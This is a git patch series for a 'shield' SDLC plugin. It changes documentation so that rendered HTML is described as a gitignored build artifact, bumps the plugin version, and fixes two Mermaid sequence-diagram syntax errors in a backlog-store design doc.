shield/schema/output-paths.yaml | 3 +++ shield/skills/general/manifest-schema.md | 2 +- 4 files changed, 7 insertions(+), 4 deletions(-) diff --git a/shield/docs/artifacts.md b/shield/docs/artifacts.md index 04fe2f4b..b00c5927 100644 --- a/shield/docs/artifacts.md +++ b/shield/docs/artifacts.md @@ -19,7 +19,7 @@ Top-level dashboard. 
Renders `manifest.json` as a card grid linking to every fea ## Per-feature (one per feature folder) -Each feature lives at `{output_dir}/{feature}/`. Source markdown is committed; rendered HTML sits alongside under `outputs/`. +Each feature lives at `{output_dir}/{feature}/`. Source markdown is committed; rendered HTML lands under `outputs/` (build artifact — gitignored; rebuild locally with `/shield render`). ### `research.md` @@ -71,7 +71,7 @@ Markdown rendering of `plan.json` for human readers. Generated alongside `plan.j ### `outputs/{prd,plan,trd}.html` -Rendered HTML siblings of the source markdown. Regenerated on every write of the corresponding source file. +Rendered HTML siblings of the source markdown — local build artifact, gitignored. Rebuild with `/shield render` (regenerates the whole site). ## Reviews diff --git a/shield/hooks/scripts/session-start.sh b/shield/hooks/scripts/session-start.sh index 20f4ace3..ee35c847 100755 --- a/shield/hooks/scripts/session-start.sh +++ b/shield/hooks/scripts/session-start.sh @@ -132,7 +132,7 @@ ${PM_MCP_WARNING:+ ${INCOMPLETE_STEPS_WARNING:+ ⚠ ${INCOMPLETE_STEPS_WARNING}} -**Artifact output:** Per-feature sources live flat at \`${OUTPUT_DIR}/{feature}/\` — e.g. \`research.md\`, \`prd.md\`, \`plan.json\`, \`plan.md\`, \`plan-architecture.md\`. Rendered HTML lands under \`${OUTPUT_DIR}/{feature}/outputs/\`. Reviews are date-keyed under \`${OUTPUT_DIR}/{feature}/reviews/{prd|plan|code}/{date}{_counter}/\` and never overwrite. Manifest at \`${OUTPUT_DIR}/manifest.json\`. (No numbered-run subfolders.) +**Artifact output:** Per-feature sources live flat at \`${OUTPUT_DIR}/{feature}/\` — e.g. \`research.md\`, \`prd.md\`, \`plan.json\`, \`plan.md\`, \`plan-architecture.md\`. Rendered HTML lands under \`${OUTPUT_DIR}/{feature}/outputs/\` (build artifact — gitignored; rebuild locally with \`/shield render\`). Reviews are date-keyed under \`${OUTPUT_DIR}/{feature}/reviews/{prd|plan|code}/{date}{_counter}/\` and never overwrite. 
Manifest at \`${OUTPUT_DIR}/manifest.json\`. (No numbered-run subfolders.) **Skill domains:** ${DOMAIN_SKILLS} ${DOMAIN_SKIP:+**Skip skills from:** ${DOMAIN_SKIP} (not relevant to this project)} diff --git a/shield/schema/output-paths.yaml b/shield/schema/output-paths.yaml index ffb425fa..2c30da30 100644 --- a/shield/schema/output-paths.yaml +++ b/shield/schema/output-paths.yaml @@ -1,3 +1,6 @@ +# NOTE: All `*_html` entries below are LOCAL BUILD ARTIFACTS — gitignored and +# regenerated on demand by /shield render (scripts/render-output.sh). The +# committed source of truth is the corresponding Markdown (+ JSON sidecars). # shield/schema/output-paths.yaml # Plugin-owned contract. Consumers should NOT edit. # See docs/superpowers/specs/2026-05-22-shield-output-structure-design.md §5. diff --git a/shield/skills/general/manifest-schema.md b/shield/skills/general/manifest-schema.md index db944292..4d7a4411 100644 --- a/shield/skills/general/manifest-schema.md +++ b/shield/skills/general/manifest-schema.md @@ -63,7 +63,7 @@ Lives at `{output_dir}/manifest.json`. This is the source of truth for which fea - `plan_json` → `{plan_json}` = `{feature_dir}/plan.json` - `plan_md` → `{plan_md}` = `{feature_dir}/plan.md` - `plan_arch_md` → `{plan_arch_md}` = `{feature_dir}/plan-architecture.md` - Each is `true` if the file exists, `false` if not. Rendered HTML siblings under `{feature_dir}/outputs/` are implied by the source presence and not tracked separately. + Each is `true` if the file exists, `false` if not. Rendered HTML siblings land under `{feature_dir}/outputs/` (build artifact — gitignored; rebuild locally with `/shield render`) and are implied by the source presence, not tracked separately. - **`features[].reviews`** — one entry per review type (`prd`, `plan`, `code`). Each: - `latest`: the highest-sorted date-keyed run folder name (e.g. 
`2026-03-21_2`) - `count`: number of run folders under `{feature_dir}/reviews//` From 67355e3c3cb8d4bed0fac34e201049cf269b54ce Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 08:28:47 +0000 Subject: [PATCH 08/10] =?UTF-8?q?chore(shield):=20bump=20to=202.28.0=20?= =?UTF-8?q?=E2=80=94=20Markdown-canonical=20output=20+=20/shield=20render?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-Authored-By: Claude Opus 4.7 (1M context) --- .claude-plugin/marketplace.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.claude-plugin/marketplace.json b/.claude-plugin/marketplace.json index e17b31a8..9b52973a 100644 --- a/.claude-plugin/marketplace.json +++ b/.claude-plugin/marketplace.json @@ -9,7 +9,7 @@ { "name": "shield", "description": "Unified SDLC plugin \u2014 research, planning, PM integration, implementation, and continuous review with multi-domain support and specialist agents", - "version": "2.27.0", + "version": "2.28.0", "source": "./shield", "category": "development" }, From 521f21307489aa4dbf88eda417b0ce91113d2a00 Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 18:02:33 +0530 Subject: [PATCH 09/10] fix(shield): mermaid sequence syntax error in backlog-store LLD Parentheses in a sequenceDiagram participant alias ("caller (/backlog add or skill)") break Mermaid's parser ("Syntax error in text"). Rephrase the alias without parens. Fixed in both the canonical docs/lld/ copy and the docs/shield/ draft. Co-Authored-By: Claude Opus 4.8 (1M context) --- docs/lld/backlog-store.md | 2 +- docs/shield/backlog-20260527/lld-backlog-store.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/docs/lld/backlog-store.md b/docs/lld/backlog-store.md index 4e0d01fa..34a74ee7 100644 --- a/docs/lld/backlog-store.md +++ b/docs/lld/backlog-store.md @@ -103,7 +103,7 @@ live in `reconciler`; this is the mechanical delete it calls. 
```mermaid sequenceDiagram - participant C as caller (/backlog add or skill) + participant C as caller via /backlog add or skill participant S as backlog_store participant FS as filesystem C->>S: capture(text, ..., source) diff --git a/docs/shield/backlog-20260527/lld-backlog-store.md b/docs/shield/backlog-20260527/lld-backlog-store.md index 4c74de09..4c5e8660 100644 --- a/docs/shield/backlog-20260527/lld-backlog-store.md +++ b/docs/shield/backlog-20260527/lld-backlog-store.md @@ -103,7 +103,7 @@ live in `reconciler`; this is the mechanical delete it calls. ```mermaid sequenceDiagram - participant C as caller (/backlog add or skill) + participant C as caller via /backlog add or skill participant S as backlog_store participant FS as filesystem C->>S: capture(text, ..., source) From b0d8dd3b00417a23d7fc471e9aa7cf9223d08450 Mon Sep 17 00:00:00 2001 From: ashwinimanoj Date: Mon, 8 Jun 2026 18:14:40 +0530 Subject: [PATCH 10/10] =?UTF-8?q?fix(shield):=20real=20mermaid=20parse=20e?= =?UTF-8?q?rror=20=E2=80=94=20semicolon=20in=20sequence=20message?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit GitHub's parser pinned the error to diagram line 10: the ';' in "append entry (...); validate in-memory doc" is treated as a statement separator, so Mermaid tries to parse "validate in-memory doc" as a new statement and fails expecting an arrow. Replace ';' with 'then'. (The earlier alias-parens change was not the cause.) 
Co-Authored-By: Claude Opus 4.8 (1M context) --- docs/lld/backlog-store.md | 2 +- docs/shield/backlog-20260527/lld-backlog-store.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/docs/lld/backlog-store.md b/docs/lld/backlog-store.md index 34a74ee7..535b49d3 100644 --- a/docs/lld/backlog-store.md +++ b/docs/lld/backlog-store.md @@ -111,7 +111,7 @@ sequenceDiagram alt malformed S-->>C: raise BacklogInvalid else ok - S->>S: append entry (uuid4 id, next order); validate in-memory doc + S->>S: append entry (uuid4 id, next order) then validate in-memory doc S->>FS: write backlog.json.tmp (full doc) + fsync S->>FS: re-check on-disk version/count (compare-before-replace) alt store changed underneath diff --git a/docs/shield/backlog-20260527/lld-backlog-store.md b/docs/shield/backlog-20260527/lld-backlog-store.md index 4c5e8660..0f7b40eb 100644 --- a/docs/shield/backlog-20260527/lld-backlog-store.md +++ b/docs/shield/backlog-20260527/lld-backlog-store.md @@ -111,7 +111,7 @@ sequenceDiagram alt malformed S-->>C: raise BacklogInvalid else ok - S->>S: append entry (uuid4 id, next order); validate in-memory doc + S->>S: append entry (uuid4 id, next order) then validate in-memory doc S->>FS: write backlog.json.tmp (full doc) + fsync S->>FS: re-check on-disk version/count (compare-before-replace) alt store changed underneath
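Note on the fix in PATCH 10/10: per the commit message, Mermaid treats `;` inside a sequence message as a statement separator, so the text after it is parsed as a new statement. A minimal sketch of a pre-render check for that pattern follows. The helper name `semicolon_messages` and the arrow list are illustrative assumptions; they are not part of Shield or of Mermaid, and the arrow list is not exhaustive.

```python
import re

# Arrow forms commonly used in Mermaid sequence diagrams (assumed, not exhaustive).
ARROW = re.compile(r"(-->>|->>|-->|->|--x|-x|--\)|-\))")


def semicolon_messages(diagram: str) -> list[tuple[int, str]]:
    """Return (line_number, message) for sequence messages that contain ';'."""
    hits = []
    for number, line in enumerate(diagram.splitlines(), start=1):
        arrow = ARROW.search(line)
        if arrow is None:
            continue  # not a message line (e.g. 'participant ...', 'alt ...')
        # The message text is whatever follows the first ':' after the arrow.
        _, colon, message = line[arrow.end():].partition(":")
        if colon and ";" in message:
            hits.append((number, message.strip()))
    return hits


# The message line from the diff above, before and after the fix.
BEFORE = """sequenceDiagram
    participant S as backlog_store
    S->>S: append entry (uuid4 id, next order); validate in-memory doc
"""
AFTER = BEFORE.replace("); validate", ") then validate")

print(semicolon_messages(BEFORE))  # flags line 3 of the snippet
print(semicolon_messages(AFTER))   # nothing flagged
```

This is a text-level heuristic only. It does not invoke Mermaid's parser, so it can miss other syntax errors and may flag semicolons that a given Mermaid version would accept.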